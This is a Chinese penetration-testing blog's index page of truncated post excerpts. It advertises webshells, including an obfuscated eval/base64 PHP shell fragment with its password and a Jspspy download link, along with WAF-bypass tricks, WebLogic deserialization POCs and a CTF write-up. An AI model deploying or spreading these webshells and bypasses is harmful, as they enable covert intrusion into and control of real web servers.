情感网文

###博客开启首页DJ&电音二日一曲轮换###

博客开启音乐轮换,二天换一首歌曲 欢迎在下面回复你想轮换的音乐 注意:请带上音乐名字以及音乐的直连地址。 网易云直连API:http://music.163.com/song/media/outer/url?id=歌曲I...继续阅读 »
渗透测试

Java简单的XSS过滤方法

因为某甲方程序XSS过滤类一直没起作用,所以百度了下,简单的写了个参数XSS过滤方法。。。。。上代码~~ import java.io.UnsupportedEncodingException; imp...继续阅读 »

[未完]记录CTF练习平台的一些WRITEUP WEB

CTF练习平台:http://ctf.bugku.com web2 直接F12查看源码 计算器 打开题目输入正确结果发现只能输入一个字符,然后源码改变长度,即可输入 ...继续阅读 »
核武器库

【备份】冰蝎动态二进制加密Shell免杀网站管理客户端

测试也可以反弹msf-shell~~~ 转载自先知社区。本文只备份下原帖子失效的客户端。。。 不知道怎么用的请先看完先知社区这几篇文章。 https://xz.ali...继续阅读 »
核武器库

在线子域名在线查询接口版

根据百度云观测的接口:http://ce.baidu.com/index/getRelatedSites?site_address=写的 不过这接口查的真的不怎么准,写这个只为练习写写代码~~~ 后...继续阅读 »
渗透测试

2018最新过全WAF/CDN/D盾/安全狗小马Or大马

首先感谢土司大佬:Math_random 上代码---注意菜刀链接密码为:ximcx <?php $x="BaSe64"; $b="_deCOde"; $c=$x.$b; eval($cc = $c('JGhhbmRs...继续阅读 »
渗透测试

记录WebLogic(CVE-2017-10271)反序列化漏洞找WEBSHELL地址

首先,郭姓某牛丢来了一个有weblogic漏洞的地址http://x.x.x.x:7001 说用k8的weblogic2628去getshell不能链接shell,我也试了下,好像确实不能链接...... 接着...继续阅读 »
渗透测试

WebLogic T3 反序列化绕过漏洞(CVE-2018-2893)检测POC

脚本来自指尖安全B牛。原文地址:https://www.secfree.com/article-957.html #!env python # -*- coding: utf-8 -*- import so...继续阅读 »
渗透测试

JDK低版本Jsp大马---Jspspy

JDK低版本可用,感谢原作者,备份下 下载地址:http://ximcx.cn/content/uploadfile/201807/jspspy.txt <%@page pageEncoding="utf-8"%&g...继续阅读 »
sitemap